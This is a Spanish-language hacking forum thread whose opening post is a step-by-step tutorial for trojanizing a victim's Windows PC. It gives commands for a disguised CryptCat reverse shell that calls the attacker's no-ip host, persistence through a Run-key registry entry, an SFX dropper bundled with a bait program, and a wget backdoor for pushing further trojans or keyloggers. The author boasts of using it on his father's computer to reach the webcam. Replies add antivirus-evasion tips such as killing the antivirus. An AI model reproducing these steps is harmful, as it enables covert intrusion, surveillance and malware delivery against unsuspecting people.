*** Hackear con CryptCat y Backdorizar *** By Vengador de las Sombras

[vengador de las sombras]

NOTA: Los programas que vamos a usar, junto con el manual del cual cojo las directrizes y amplio son de "Manual de Cryptcat I" de WHK

  Antes de empezar con este tutorial, debemos de coger los materiales que emplearemos:

   -
Para ver este enlace Registrate o Inicia Sesion

CRYPTCAT

   -
Para ver este enlace Registrate o Inicia Sesion

Wget

  Lo primero de todo será cambiarles el nombre a los .exe, por si a la víctima le da por ver los procesos desde el admin de tareas (ctrl + allt+surp) lo vea como normales... les cambiaremos los nombres de la siguiente forma:

cryptcat.exe > msnmsgr.exe
wget.exe > update.exe


Tras haber hecho esto, creamos un .bat que se agregue al registro y que ponga la shell de la víctima. Antes de crear el batch,  necesitaremos tener una cuenta no-ip para que se conecte la víctima ha nuestras DNS y así si cambiamos de IP, no perdamos la víctima .

  El código del batch puede ser el mismo que para nc, ya que cryptcat utiliza la misma sintaxis que nc, siendo la única diferencia que éste encripta los paquetes, así si nos sniffean la red verán los paquetes encriptados y no se coscaran de nada . El batch lo ejecutaré cuando ya tenga la shell... y sería algo tipo:

Código:

@echo off
reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homepath%\update\msnmsgr.exe -d -e cmd.exe argeniversohack.no-ip.biz 28" /f > nul
exit

 Ahora procedamos a crear un SFX con un programa, con el cryptcat y con  el Wget (Que usaremos como backdoor).






Ahora ocultamos los archivos...


A continuación seleccionamos un icono para nuestro archivo SXF, y aceptamos.



Ahora nos deslizamos hasta la pestaña de comentarios y añadimos esto:

Código:

Setup=msnmsgr.exe -d -e cmd.exe
Setup=(PROGRAMA CEBO)

Y ponemos tantos Setup's como programas queramos que se ejecuten...
 
Mientras que enviamos nuestra trampa (previamente cambiandole el nombre y comprimiendolo) procedemos a ir a nuestro cmd y ponemos:

Código:

cryptcat -vv -L -p 28

Al final cuando la víctima ejecute nuestra trampa, tendremos acceso a su shell... =).



A parte de ya poder hacer lo que queramos, le tenemos backdorizado con el Wget. Ahora podemos descargar archivos a su PC sin que la víctima se entere. Para ello deberemos de buscar un hosting (tripod es el que yo uso porque me permite subir .exe) y uploadear el archivo que queramos introducir en la víctima. Y desde la shell de nuestra víctima pondremos (estando situados en la misma carpeta donde teníamos el wget):

Código:

update.exe -c -t0 http://www.PAGINAAQUI.com/ARCHIVOAQUI.exe

En mi caso, subí el server del turkojan, para poder ver la webcam de mi víctima, pero vosotros podeis subir lo que querais, como un keylogger creado por vosotros... simplemente lo ejecutais desde línea de comandos cuando os lo descargueis y vualá.


PD: El manual lo hize usando a The Last como ayudante, para que esto no fuera ilegal. Exceptuando la parte en la que subo el troyano etc, porque a el no se lo subí. Pero al ordenador de mi padre si que conseguí subir. De todas formas por privacidad omito las fotos en las que aparecen su info.

Byt3z.

[.arekkusu.]

buen manual vengador de las sombras...... después lo probare.... pero una cosa el link de Wget esta roto..... lo puedes arreglar o subirlo a otro host???

gracias de todas formas

[vengador de las sombras]

Resubido el Wget.

Byt3z

[:.:P3R530:.:]

de 10, pero y los AV?

[el azechante]

el cryptcat es indetectable a los av por ahora, y el wget no es un virus, en todo caso te detectaria si le bajas un troyano después, pero puedes hacer un taskkill al antivirus que tenga, y luega se lo bajas.

[vengador de las sombras]

de 10, pero y los AV?

Hasta hace una semana indetectable, a diferencia de su hermano NetCat XD. De todas formas, para que siga siendolo si le pasas un iexpress no viene nada mal .

Y el wget lo mismo, es una herramienta muy utilizada en servidores.

[.arekkusu.]

tengo una pregunta.... a la hora de hacer el auto ejecutable donde entra el wget.... cuando se ejecuta?? como se ejecuta?? y el .bat también entra en el auto ejecutable??? yo lo metí y en comentarios puse "Setup=,,,,,.bat ...... pero no lo tengo del todo claro..... me lo podrías aclarar???

gracias y un saludo

[vengador de las sombras]

Saludos!

  El wget no lo ejecutes en el autoextraible. Ejecutalo cuando ya tengas la shell, para menterle archivos desde un servidor a tu víctima. Y el bat... yo normalmente lo ejecuto cuando ya tengo la shell (comando START), pero si quieres ejecutarlo en el autoextraible tambien funcionaría

[.arekkusu.]

aaaaaa.... vale vale... ya lo he pillado  lo siento por haberte molestado..... gracias...

saludos

[Cônc3pt]

Buenisimo de 10.

Ahora mismo lo bajo y lo pruebo todo.

Sigue con tus aportes Vengador 

Att.

Concept.

[aima]

Muy buena, me  a encantado te mereces un premio , dile al Master que te suba

[SkRoM]

Muy bueno felñic9idades man

[hotbeach]

hola buenas noches tengo una pregunta, lei en un manual de esta web un tutorial de troyanizar netcat.
en lo que en este manual es la segunda foto, en el de netcat decia...

En “Ejecutar tras la extracción” le escribimos esto = iexplorer.exe -d -e cmd.exe [aca va nuestra ip] 80

En “Ejecutar antes de la extracción” le escribimos lo siguiente = %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe 127.0.0.1 80" /f > nul

llegados aqui mi duda es...

@echo off
reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homepath%\update\msnmsgr.exe -d -e cmd.exe argeniversohac k.no-ip.biz 28" /f > nul
exit

no entiendo...don de colocas tu ese texto?

PD se me paso esto...
en tu caso seria asi?ya que hay q ejecutar 2 no?
Setup=msnmsgr.exe -d -e cmd.exe
Setup=update.exe -d -e cmd.exe

un saludo lo siento es que no se...

[vengador de las sombras]

hola buenas noches tengo una pregunta, lei en un manual de esta web un tutorial de troyanizar netcat.
en lo que en este manual es la segunda foto, en el de netcat decia...

En “Ejecutar tras la extracción” le escribimos esto = iexplorer.exe -d -e cmd.exe [aca va nuestra ip] 80

En “Ejecutar antes de la extracción” le escribimos lo siguiente = %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe 127.0.0.1 80" /f > nul

llegados aqui mi duda es...

no entiendo...don de colocas tu ese texto?

PD se me paso esto...
en tu caso seria asi?ya que hay q ejecutar 2 no?
Setup=msnmsgr.exe -d -e cmd.exe
Setup=update.exe -d -e cmd.exe

un saludo lo siento es que no se...

Lo que yo hice fue crear un batch que metí en el SFX. Cuando ya tuve la shell le hice un start /INTERACTIVE para que se ejecutara y se agregara al registro.

-----------------

Puse:
Setup=msnmsgr.exe -d -e cmd.exe
Setup=iecookiesview.exe (el cebo)
O similar, no me acuerdo cual fue el cebo X)

[hotbeach]

ah vale gracias, copiare tu sistema entonces, aunq sea desde netcat...graci as y un saludo

______________ ______________ ______________ ______________ ______________ ______________ _____________


tengo otra pregunta/duda resulta que ya e conseguido seguir este manual con exito lo malo es lo siguiente (las presas me duran poco, no se si es por usar el puerto 6969 o por que...) ¿existe diferencia entre poner un puerto o otro puerto?? un saludo